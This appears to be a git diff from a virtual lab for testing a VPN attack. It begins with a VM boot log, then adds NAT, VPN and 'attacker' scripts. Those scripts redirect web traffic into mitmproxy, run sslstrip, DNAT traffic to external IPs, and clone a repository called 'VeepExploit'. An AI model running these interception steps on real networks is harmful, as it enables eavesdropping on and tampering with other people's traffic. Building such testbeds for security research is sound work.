loaded (major 249) +[ 4.109133] io scheduler noop registered +[ 4.109944] io scheduler deadline registered (default) +[ 4.111048] io scheduler cfq registered +[ 4.111922] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 +[ 4.112997] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 +[ 4.114299] ACPI: AC Adapter [AC] (on-line) +[ 4.115278] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 +[ 4.116958] ACPI: Power Button [PWRF] +[ 4.117833] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 +[ 4.119481] ACPI: Sleep Button [SLPF] +[ 4.133847] GHES: HEST is not enabled! +[ 4.134520] ACPI: Battery Slot [BAT0] (battery present) +[ 4.136999] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled +[ 4.165823] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A +[ 4.170212] Linux agpgart interface v0.103 +[ 4.181326] loop: module loaded +[ 4.184276] scsi host0: ata_piix +[ 4.185208] scsi host1: ata_piix +[ 4.185962] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 1 + +[ 4.21420 ata PATAax UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 + +[ 4.371327] libphy: Fixed MDIO Bus: probed +[ 4.379093] tun: Universal TUN/TAP device driver, 1.6 +[ 4.388011] tun: (C) 1999-2004 Max Krasnyansky +[ 4.391183] PPP generic driver version 2.4.2 +[ 4.426128] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver +[ 4.468388] ehci-pci: EHCI PCI platform driver +[ 4.469378] ehci-platform: EHCI generic platform driver +[ 4.470444] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver +[ 4.485015] ohci-pci: OHCI PCI platform driver +[ 4.486130] ohci-platform: OHCI generic platform driver +[ 4.503008] uhci_hcd: USB Universal Host Controller Interface driver +[ 4.504486] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 +[ 4.511206] serio: i8042 KBD port at 0x60,0x64 irq 1 +[ 4.513002] serio: i8042 AUX port at 0x60,0x64 irq 12 +[ 4.515083] mousedev: PS/2 mouse device common for all mice +[ 4.524484] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 +[ 4.526761] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram +[ 4.529286] i2c /dev entries driver +[ 4.530851] device-mapper: uevent: version 1.0.3 +[ 4.533079] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 +[ 4.536683] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com +[ 4.540261] ledtrig-cpu: registered to indicate activity on CPUs +[ 4.549094] NET: Registered protocol family 10 +[ 4.552582] NET: Registered protocol family 17 +[ 4.554293] Key type dns_resolver registered +[ 4.556680] registered taskstats version 1 +[ 4.560041] Loading compiled-in X.509 certificates +[ 4.563348] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' +[ 4.576400] zswap: loaded using pool lzo/zbud +[ 4.590129] Key type trusted registered +[ 4.612729] Key type encrypted registered +[ 4.622125] AppArmor: AppArmor sha1 policy hashing enabled +[ 4.623722] ima: No TPM chip found, activating TPM-bypass! +[ 4.624935] ima: Allocated hash algorithm: sha1 +[ 4.625962] evm: HMAC attrs: 0x1 +[ 4.633605] Magic number: 5:763:654 +[ 4.635183] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:17 UTC (1611614297) +[ 4.650532] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found +[ 4.651956] EDD information not available. +[ 4.657952] Freeing unused kernel memory: 1492K +[ 4.675194] Write protecting the kernel read-only data: 14336k +[ 4.680037] Freeing unused kernel memory: 1592K +[ 4.915093] Freeing unused kernel memory: 56K +Loading, please [ 4.930592] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +wait... +starting version 229 +[ 4.932410] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.932440] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.962890] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.962953] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.963123] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.963190] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.963255] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.963321] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.963383] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.222068] Fusion MPT base driver 3.04.20 +[ 5.253499] Copyright (c) 1999-2008 LSI Corporation +[ 5.305227] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI +[ 5.306739] e1000: Copyright (c) 1999-2006 Intel Corporation. +[ 5.312221] Fusion MPT SPI Host driver 3.04.20 +[ 5.353626] AVX2 version of gcm_enc/dec engaged. +[ 5.373129] AES CTR mode by8 optimization enabled +[ 5.542642] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 +[ 5.726480] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff +[ 5.800149] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection +[ 6.171083] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:61:0b:02 +[ 6.201230] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection +[ 6.223638] mptbase: ioc0: Initiating bringup +[ 6.241009] e1000 0000:00:03.0 enp0s3: renamed from eth0 +[ 6.267244] e1000 0000:00:08.0 enp0s8: renamed from eth1 +[ 6.303237] ioc0: LSI53C1030 A0: Capabilities={Initiator} +[ 6.520098] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 +[ 6.849681] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 6.913779] scsi target2:0:0: Beginning Domain Validation +[ 6.919912] scsi target2:0:0: Domain Validation skipping write tests +[ 6.922770] scsi target2:0:0: Ending Domain Validation +[ 6.936603] scsi target2:0:0: asynchronous +[ 6.951595] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 6.972824] scsi target2:0:1: Beginning Domain Validation +[ 6.979364] scsi target2:0:1: Domain Validation skipping write tests +[ 6.983056] scsi target2:0:1: Ending Domain Validation +[ 6.986256] scsi target2:0:1: asynchronous +[ 7.011309] sd 2:0:0:0: Attached scsi generic sg0 type 0 +[ 7.015149] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) +[ 7.018770] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) +[ 7.025220] sd 2:0:0:0: [sda] Write Protect is off +[ 7.028055] sd 2:0:1:0: Attached scsi generic sg1 type 0 +[ 7.031686] sd 2:0:0:0: [sda] Incomplete mode parameter data +[ 7.034018] sd 2:0:0:0: [sda] Assuming drive cache: write through +[ 7.037012] sd 2:0:1:0: [sdb] Write Protect is off +[ 7.040906] sd 2:0:1:0: [sdb] Incomplete mode parameter data +[ 7.044586] sd 2:0:1:0: [sdb] Assuming drive cache: write through +[ 7.054905] sda: sda1 +[ 7.057440] sd 2:0:0:0: [sda] Attached SCSI disk +[ 7.061141] sd 2:0:1:0: [sdb] Attached SCSI disk +Begin: Loading essential drivers ... [ 8.786645] md: linear personality registered for level -1 +[ 8.809845] md: multipath personality registered for level -4 +[ 8.856467] md: raid0 personality registered for level 0 +[ 8.894380] md: raid1 personality registered for level 1 +[ 9.035321] raid6: sse2x1 gen() 2850 MB/s +[ 9.103172] raid6: sse2x1 xor() 5213 MB/s +[ 9.171370] raid6: sse2x2 gen() 7439 MB/s +[ 9.244231] raid6: sse2x2 xor() 3720 MB/s +[ 9.330301] raid6: sse2x4 gen() 9858 MB/s +[ 9.411039] raid6: sse2x4 xor() 5637 MB/s +[ 9.479084] raid6: avx2x1 gen() 5819 MB/s +[ 9.564087] raid6: avx2x2 gen() 8858 MB/s +[ 9.651114] raid6: avx2x4 gen() 9868 MB/s +[ 9.652377] raid6: using algorithm avx2x4 gen() 9868 MB/s +[ 9.653550] raid6: using avx2x2 recovery algorithm +[ 9.698696] xor: automatically using best checksumming function: +[ 9.798989] avx : 26200.000 MB/sec +[ 9.808512] async_tx: api initialized (async) +[ 9.888917] md: raid6 personality registered for level 6 +[ 9.892220] md: raid5 personality registered for level 5 +[ 9.895892] md: raid4 personality registered for level 4 +[ 9.990793] md: raid10 personality registered for level 10 +done. +Begin: Running /scripts/init-premount ... done. +Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. +Begin: Running /scripts/local-premount ... [ 10.103815] Btrfs loaded +Scanning for Btrfs filesystems +done. +Warning: fsck not present, so skipping root file[ 10.223378] EXT4-fs (sda1): INFO: recovery required on readonly filesystem + system +[ 10.233665] EXT4-fs (sda1): write access will be enabled during recovery +[ 10.388937] EXT4-fs (sda1): recovery complete +[ 10.392064] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) +done. +Begin: Running /scripts/local-bottom ... done. +Begin: Running /scripts/init-bottom ... done. +[ 11.109800] systemd[1]system229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APRMOR+SACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) + +[ 11.460244] systemd[1]: Detected virtualization oracle. +[ 11.461401] systemd[1]: Detected architecture x86-64. + +Welcome to Ubuntu 16.04.7 LTS! + +[ 11.482881] systemd[1]: Set hostname to . +[ 11.612942] random: nonblocking pool is initialized +[ 11.808150] systemd[1]: Reached target Swap. +[ OK ] Reached target Swap. +[ 11.819421] systemd[1]: Listening on udev Control Socket. +[ OK ] Listening on udev Control Socket. +[ 11.850068] systemd[1]: Reached target User and Group Name Lookups. +[ OK ] Reached target User and Group Name Lookups. +[ 11.934451] systemd[1]: Reached target Encrypted Volumes. +[ OK ] Reached target Encrypted Volumes. +[ 11.941003] systemd[1]: Listening on udev Kernel Socket. +[ OK ] Listening on udev Kernel Socket. +[ 11.955528] systemd[1]: Created slice User and Session Slice. +[ OK ] Created slice User and Session Slice. +[ 11.958431] systemd[1]: Listening on LVM2 poll daemon socket. +[ OK ] Listening on LVM2 poll daemon socket. +[ 12.012300] systemd[1]: Crete sic System Slice. + +[ OK ] Created slice System Slice. +[ 12.285521] systemd[1]: Created slice system-serial\x2dgetty.slice. +[ OK ] Created slice system-serial\x2dgetty.slice. +[ 12.299640] systemd[1]: Rched tget Slices. + +[ OK ] Reached target Slices. +[ 12.418492] systemd[1]: Listening on Journal Socket. +[ OK ] Listening on Journal Socket. +[ 12.467279] systemd[1]: Starting Load Kernel Modules... + Starting Load Kernel Modules... +[ 12.513443] Loading iSCSI transport class v2.0-870. +[ 12.521364] systemd[1]: Mounting Huge Pages File System... + Mounting Huge Pages File System... +[ 12.554444] systemd[1]: Starting Create list of required static device nodes for the current kernel... + Starting Create list of required st... nodes for the current kernel... +[ 12.654166] systemd[1]: Starting Remount Root and Kernel File Systems... +[ 12.714486] iscsi: registered transport (tcp) +[ 12.767083] EXT4-fs (sda1): re-mounted. Opts: (null) + Starting Remount Root and Kernel File Systems... +[ 12.791368] systemd[1]: Starting Nameserver information manager... + Starting Nameserver information manager... +[ 12.860322] systemd[1]: Mounting POSIX Message Queue File System... + Mounting POSIX Message Queue File System... +[ 12.878533] systemd[1]: Listening on Journal Socket (/dev/log). +[ OK ] Listening on Journal Socket (/dev/log). +[ 12.907524] systemd[1]: Listening on Syslog Socket. +[ OK ] Listening on Syslog Socket. +[ 12.922375] systemd[1]: Started Forward Password Requests to Wall Directory Watch. +[ OK ] Started Forward Password Requests to Wall Directory Watch. +[ 12.942504] systemd[1]: Listening on Device-mapper event daemon FIFOs. +[ OK ] Listening on Device-mapper event daemon FIFOs. +[ 12.971063] systemd[1]: Mounting Debug File System... + [ 12.987005] iscsi: registered transport (iser) +Mounting Debug File System... +[ 13.023618] systemd[1]: Listening on Journal Audit Socket. +[ OK ] Listening on Journal Audit Socket. +[ 13.095237] systemd[1]: Starting Journal Service... + Starting Journal Service... +[ 13.118278] systemd[1]: Starting Set console keymap... + Starting Set console keymap... +[ 13.151542] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. +[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. +[ 13.207456] systemd[1]: Starting Uncomplicated firewall... + Starting Uncomplicated firewall... +[ 13.262764] systemd[1]: Listening on LVM2 metadata daemon socket. +[ OK ] Listening on LVM2 metadata daemon socket. +[ 13.303303] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... + Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... +[ 13.371604] systemd[1]: Reached target System Time Synchronized. +[ OK ] Reached target System Time Synchronized. +[ 13.393524] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. +[ OK ] Listening on /dev/initctl Compatibility Named Pipe. +[ 13.439303] systemd[1]: Started Trigger resolvconf update for networkd DNS. +[ OK ] Started Trigger resolvconf update for networkd DNS. +[ 13.480178] systemd[1]: Mounted Debug File System. +[ OK ] Mounted Debug File System. +[ 13.490401] systemd[1]: Mounted Huge Pages File System. +[ OK ] Mounted Huge Pages File System. +[ 13.544095] systemd[1]: Mounted POSIX Message Queue File System. +[ OK ] Mounted POSIX Message Queue File System. +[ 13.570103] systemd[1]: Started Journal Service. +[ OK ] Started Journal Service. +[ OK ] Started Load Kernel Modules. +[ OK ] Started Create list of required sta...ce nodes for the current kernel. +[ OK ] Started Remount Root and Kernel File Systems. +[ OK ] Started Set console keymap. +[ OK ] Started Uncomplicated firewall. +[ OK ] Started Nameserver information manager. +[ OK ] Started LVM2 metadata daemon. + Starting Load/Save Random Seed... + Starting udev Coldplug all Devices... + Starting Create Static Device Nodes in /dev... + Mounting FUSE Control File System... + Starting Apply Kernel Variables... + Starting Flush Journal to Persistent Storage... +[ OK ] Mounted FUSE Control File System. +[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. +[ OK ] Started Load/Save Random Seed. +[ OK ] Started Create Static Device Nodes in /dev. +[ OK ] Started Apply Kernel Variables. + Starting udev Kernel Device Manager... +[ OK ] Reached target Local File Systems (Pre). +[ OK ] Reached target Local File Systems. + Starting LSB: AppArmor initialization... + Starting Set console font and keymap... + Starting Tell Plymouth To Write Out Runtime Data... + Starting Initial cloud-init job (pre-networking)... +[ OK ] Started udev Kernel Device Manager. +[ OK ] Started udev Coldplug all Devices. +[ OK ] Started Tell Plymouth To Write Out Runtime Data. +[ OK ] Started Dispatch Password Requests to Console Directory Watch. +[ OK ] Started Flush Journal to Persistent Storage. + Starting Create Volatile Files and Directories... +[ OK ] Started Create Volatile Files and Directories. +[ OK ] Started LSB: AppArmor initialization. +[ OK ] Found device /dev/ttyS0. +[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. + Starting Load AppArmor profiles managed internally by snapd... + Starting Update UTMP about System Boot/Shutdown... +[ OK ] Started Load AppArmor profiles managed internally by snapd. +[ OK ] Started Set console font and keymap. +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Started Update UTMP about System Boot/Shutdown. +[ OK ] Created slice system-getty.slice. +[ 17.363569] cloud-init[502]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:31 +0000. Up 16.36 seconds. +[ OK ] Started Initial cloud-init job (pre-networking). +[ OK ] Reached target Network (Pre). +[ OK ] Started ifup for enp0s3. +[ OK ] Started ifup for enp0s8. + Starting Raise network interfaces... +[ OK ] Started Raise network interfaces. +[ OK ] Reached target Network. + Starting Initial cloud-init job (metadata service crawler)... +[ 19.628876] cloud-init[1092]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:33 +0000. Up 19.00 seconds. +[ 19.636441] cloud-init[1092]: ci-info: ++++++++++++++++++++++++++++++++++++++Net device info++++++++++++++++++++++++++++++++++++++ +[ 19.656534] cloud-init[1092]: ci-info: +--------+------+----------------------------+---------------+--------+-------------------+ +[ 19.732641] cloud-init[1092]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | +[ 19.732927] cloud-init[1092]: ci-info: +--------+------+----------------------------+---------------+--------+-------------------+ +[ 19.733104] cloud-init[1092]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | +[ OK ] Started Initial cloud-init job (metadata service crawler). +[ 19.733424] cloud-init[1092]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | +[ 19.904318] cloud-init[1092]: ci-info: | enp0s8 | True | 172.16.4.2 | 255.255.255.0 | global | 08:00:27:61:0b:02 | +[ 19.904644] cloud-init[1092]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe61:b02/64 | . | link | 08:00:27:61:0b:02 | +[ 19.905967] cloud-init[1092]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | +[ 19.906139] cloud-init[1092]: ci-info: | lo | True | ::1/128 | . | host | . | +[ 19.906328] cloud-init[1092]: ci-info: +--------+------+----------------------------+---------------+--------+-------------------+ +[ 19.906503] cloud-init[1092]: ci-info: +++++++++++++++++++++++++++++Route IPv4 info++++++++++++++++++++++++++++++ +[ 19.906695] cloud-init[1092]: ci-info: +-------+-------------+--------------+---------------+-----------+-------+ +[ 19.906877] cloud-init[1092]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | +[ 19.907071] cloud-init[1092]: ci-info: +-------+-------------+--------------+---------------+-----------+-------+ +[ 19.907303] cloud-init[1092]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | +[ OK ] Reached target Network is Online. +[ 19.907512] cloud-init[1092]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | +[ 20.232272] cloud-init[1092]: ci-info: | 2 | 172.16.0.0 | 172.16.4.254 | 255.255.0.0 | enp0s8 | UG | +[ 20.232548] cloud-init[1092]: ci-info: | 3 | 172.16.4.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | +[ 20.232713] cloud-init[1092]: ci-info: | 4 | 192.168.0.0 | 172.16.4.254 | 255.255.0.0 | enp0s8 | UG | +[ 20.233114] cloud-init[1092]: ci-info: +-------+-------------+--------------+---------------+-----------+-------+ +[ 20.233245] cloud-init[1092]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ +[ 20.233376] cloud-init[1092]: ci-info: +-------+-------------+---------+-----------+-------+ + Starting iSCSI initiator daemon (iscsid)... +[[ 20.233542] cloud-init[1092]: ci-info: | Route | Destination | Gateway | Interface | Flags | +[ 20.516855] cloud-init[1092]: ci-info: +-------+-------------+---------+-----------+-------+ + OK ] Reached target Cloud-config availability. +[[ 20.516994] cloud-init[1092]: ci-info: | 0 | fe80::/64 | :: | enp0s8 | U | +[ 20.589595] cloud-init[1092]: ci-info: | 1 | fe80::/64 | :: | enp0s3 | U | +[ 20.589712] cloud-init[1092]: ci-info: | 4 | ff00::/8 | :: | enp0s8 | U | + OK ] Reached target System Initialization. +[ 20.589974] cloud-init[1092]: ci-info: | 5 | ff00::/8 | :: | enp0s3 | U | +[ 20.699002] cloud-init[1092]: ci-info: +-------+-------------+---------+-----------+-------+ + Starting LXD - unix socket. +[ OK ] Listening on ACPID Listen Socket. +[ OK ] Started Daily apt download activities. +[ OK ] Listening on D-Bus System Message Bus Socket. +[ OK ] Listening on UUID daemon activation socket. +[ OK ] Started Message of the Day. +[ OK ] Started ACPI Events Check. +[ OK ] Reached target Paths. +[ OK ] Started Daily apt upgrade and clean activities. + Starting Socket activation for snappy daemon. +[ OK ] Started Daily Cleanup of Temporary Directories. +[ OK ] Reached target Timers. +[ OK ] Listening on LXD - unix socket. +[ OK ] Listening on Socket activation for snappy daemon. +[ OK ] Started iSCSI initiator daemon (iscsid). + Starting Login to default iSCSI targets... +[ OK ] Reached target Sockets. +[ OK ] Reached target Basic System. + Starting LSB: MD monitoring daemon... + Starting LXD - container startup/shutdown... +[ OK ] Started Deferred execution scheduler. + Starting Login Service... + Starting Accounts Service... +[ OK ] Started D-Bus System Message Bus. +[ OK ] Started ACPI event daemon. + Starting /etc/rc.local Compatibility... +[ OK ] Started FUSE filesystem for LXC. + Starting System Logging Service... + Starting Virtualbox guest utils... +[ OK ] Started Regular background program processing daemon. + Starting OpenBSD Secure Shell server... + Starting OpenVPN service... + Starting Snap Daemon... + Starting LSB: Record successful boot for GRUB... +[ OK ] Started System Logging Service. +[ OK ] Started LXD - container startup/shutdown. +[ OK ] Started /etc/rc.local Compatibility. +[ OK ] Started OpenVPN service. +[ OK ] Started OpenBSD Secure Shell server. +[ OK ] Started Login to default iSCSI targets. +[ OK ] Started LSB: MD monitoring daemon. +[ OK ] Started Login Service. +[ OK ] Started Unattended Upgrades Shutdown. + Starting Authenticate and Authorize Users to Run Privileged Tasks... +[ OK ] Reached target Remote File Systems (Pre). +[ OK ] Reached target Remote File Systems. + Starting LSB: automatic crash report generation... + Starting LSB: daemon to balance interrupts for SMP systems... + Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... + Starting Permit User Sessions... +[ OK ] Started LSB: Record successful boot for GRUB. +[ OK ] Started Virtualbox guest utils. +[ OK ] Started Permit User Sessions. + Starting Hold until boot process finishes up... + Starting Terminate Plymouth Boot Screen... +[ OK ] Started Hold until boot process finishes up. +[ OK ] Started Terminate Plymouth Boot Screen. +[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. +[ OK ] Started Getty on tty1. +[ OK ] Started Serial Getty on ttyS0. +[ OK ] Reached target Login Prompts. + Starting Set console scheme... +[ OK ] Started LSB: daemon to balance interrupts for SMP systems. +[ OK ] Started Set console scheme. +[ OK ] Started Snap Daemon. +[ OK ] Started Accounts Service. + Starting Wait until snapd is fully seeded... +[ OK ] Started LSB: automatic crash report generation. +[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". +[ OK ] Started Wait until snapd is fully seeded. + Starting Apply the settings specified in cloud-config... +[ OK ] Reached target Multi-User System. +[ OK ] Reached target Graphical Interface. + Starting Update UTMP about System Runlevel Changes... +[ OK ] Started Update UTMP about System Runlevel Changes. +[ 25.288210] cloud-init[1355]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:39 +0000. Up 25.00 seconds. +[ OK ] Started Apply the settings specified in cloud-config. + Starting Execute cloud user/final scripts... +[ 26.136818] cloud-init[1371]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:40 +0000. Up 25.89 seconds. +[ 26.162920] cloud-init[1371]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:41 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 26.11 seconds +[ OK ] Started Execute cloud user/final scripts. +[ OK ] Reached target Cloud-init target. + +Ubuntu 16.04.7 LTS client1 ttyS0 + +client1 login: \ No newline at end of file diff --git a/virtual-test-environment/edgers/setups/add_nat.sh b/virtual-test-environment/edgers/setups/add_nat.sh new file mode 100755 index 0000000..2520ed0 --- /dev/null +++ b/virtual-test-environment/edgers/setups/add_nat.sh @@ -0,0 +1,28 @@ +#!/bin/bash +# + +echo "Setting up iptables rules for NAT stuff.." + +echo iptables-persistent iptables-persistent/autosave_v4 boolean true | sudo debconf-set-selections +echo iptables-persistent iptables-persistent/autosave_v6 boolean true | sudo debconf-set-selections +sudo apt-get install iptables-persistent -y + +echo Flusing any old iptables rules.. + +sudo iptables -F + +sudo iptables --table nat -F + +sudo iptables --delete-chain + +sudo iptables --table nat --delete-chain + +echo Adding forward and masquerade rule for NATing + +sudo iptables -t nat --append POSTROUTING --out-interface enp0s8 -j MASQUERADE + +sudo iptables --append FORWARD --in-interface enp0s9 -j ACCEPT + +echo Saving the current iptables config.. + +sudo netfilter-persistent save diff --git a/virtual-test-environment/edgers/setups/add_tun_rule.sh b/virtual-test-environment/edgers/setups/add_tun_rule.sh new file mode 100755 index 0000000..b385dd7 --- /dev/null +++ b/virtual-test-environment/edgers/setups/add_tun_rule.sh @@ -0,0 +1,6 @@ +#!/bin/bash +# + +echo Routing all traffic to web server through tun.. +#up route add -net 192.168.0.0/16 gw 192.168.2.254 dev enp0s8 +sudo ip route add 192.168.3.2 dev tun0 diff --git a/virtual-test-environment/edgers/setups/attacker/connect.sh b/virtual-test-environment/edgers/setups/attacker/connect.sh new file mode 100755 index 0000000..bfb162e --- /dev/null +++ b/virtual-test-environment/edgers/setups/attacker/connect.sh @@ -0,0 +1,15 @@ +#/bin/bash +#! + +echo "Connecting to local vpn server.." + +sleep 0.1 + +sudo openvpn --client --config client* & + + +sleep 8 # might need to sleep longer to make sure tun0 exists + +echo "Adding ip route rule to force traffic destined for web+dns servers to use vpn tun interface" + +sudo ip route add 192.168.3.2 dev tun0 diff --git a/virtual-test-environment/edgers/setups/attacker/mitm_setup.sh b/virtual-test-environment/edgers/setups/attacker/mitm_setup.sh new file mode 100755 index 0000000..0a19162 --- /dev/null +++ b/virtual-test-environment/edgers/setups/attacker/mitm_setup.sh @@ -0,0 +1,17 @@ +#/bin/bash +# + + +echo Adding nat iptables rules to route traffic through mitmproxy.. + +sudo iptables -t nat -A PREROUTING -i enp0s8 -p tcp --dport 80 -j REDIRECT --to-port 8080 +sudo iptables -t nat -A PREROUTING -i enp0s8 -p tcp --dport 443 -j REDIRECT --to-port 8080 + + + +echo Adding redirect to real server rules.. + +REDIRECT_IP=157.240.2.35 + +sudo iptables -t nat -A OUTPUT -p tcp -d 192.168.2.2 --destination-port 80 -j DNAT --to-destination $REDIRECT_IP +sudo iptables -t nat -A OUTPUT -p tcp -d 192.168.2.2 --destination-port 443 -j DNAT --to-destination $REDIRECT_IP diff --git a/virtual-test-environment/edgers/setups/attacker/setup_attacker.sh b/virtual-test-environment/edgers/setups/attacker/setup_attacker.sh new file mode 100755 index 0000000..b20858d --- /dev/null +++ b/virtual-test-environment/edgers/setups/attacker/setup_attacker.sh @@ -0,0 +1,33 @@ +#!/bin/bash +# + +echo "Cloning libitns from git.." +cd ~ +git clone https://github.com/mfontanini/libtins.git + + +echo "Installing requirements (libpcap, libssl, cmake, g++)" + +sudo apt install libpcap-dev libssl-dev cmake -y +sudo apt install g++ -y + + +echo "Compiling libtins.." + +cd ~/libtins +mkdir -p build +cd build +cmake ../ -DLIBTINS_ENABLE_CXX11=1 +make + +sudo make install + + +echo "Updating ldconfig cache.." +sudo ldconfig + + +echo "Cloning attack repo.." +cd ~ +pwd +git clone https://git.breakpointingbad.com/beau/VeepExploit.git diff --git a/virtual-test-environment/edgers/setups/attacker/setup_nat.sh b/virtual-test-environment/edgers/setups/attacker/setup_nat.sh new file mode 100755 index 0000000..8afced6 --- /dev/null +++ b/virtual-test-environment/edgers/setups/attacker/setup_nat.sh @@ -0,0 +1,29 @@ +#!/bin/bash +# + + +echo iptables-persistent iptables-persistent/autosave_v4 boolean true | sudo debconf-set-selections +echo iptables-persistent iptables-persistent/autosave_v6 boolean true | sudo debconf-set-selections +sudo apt-get install iptables-persistent -y + +echo Flusing any old iptables rules.. + +sudo iptables -F + +sudo iptables --table nat -F + +sudo iptables --delete-chain + +sudo iptables --table nat --delete-chain + +echo Adding forward and masquerade rule for NATing + +sudo iptables -t nat --append POSTROUTING --out-interface enp0s3 -j MASQUERADE + +sudo iptables --append FORWARD --in-interface enp0s8 -j ACCEPT + +echo Saving the current iptables config.. + +sudo netfilter-persistent save + + diff --git a/virtual-test-environment/edgers/setups/attacker/strip.sh b/virtual-test-environment/edgers/setups/attacker/strip.sh new file mode 100755 index 0000000..e6ef51d --- /dev/null +++ b/virtual-test-environment/edgers/setups/attacker/strip.sh @@ -0,0 +1,8 @@ +#/bin/bash +# + +sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 + +sslstrip -l 8080 -w strip.log + +sudo iptables -t nat -A OUTPUT -p tcp -d 69.172.200.235 -j DNAT --to-destination 34.98.124.198 diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/bind.keys b/virtual-test-environment/edgers/setups/dns/bind_config/bind.keys new file mode 100755 index 0000000..6d4217f --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/bind.keys @@ -0,0 +1,38 @@ +# The bind.keys file is used to override the built-in DNSSEC trust anchors +# which are included as part of BIND 9. The only trust anchors it contains +# are for the DNS root zone ("."). Trust anchors for any other zones MUST +# be configured elsewhere; if they are configured here, they will not be +# recognized or used by named. +# +# To use the built-in root key, set "dnssec-validation auto;" in the +# named.conf options, or else leave "dnssec-validation" unset. If +# "dnssec-validation" is set to "yes", then the keys in this file are +# ignored; keys will need to be explicitly configured in named.conf for +# validation to work. "auto" is the default setting, unless named is +# built with "configure --disable-auto-validation", in which case the +# default is "yes". +# +# This file is NOT expected to be user-configured. +# +# Servers 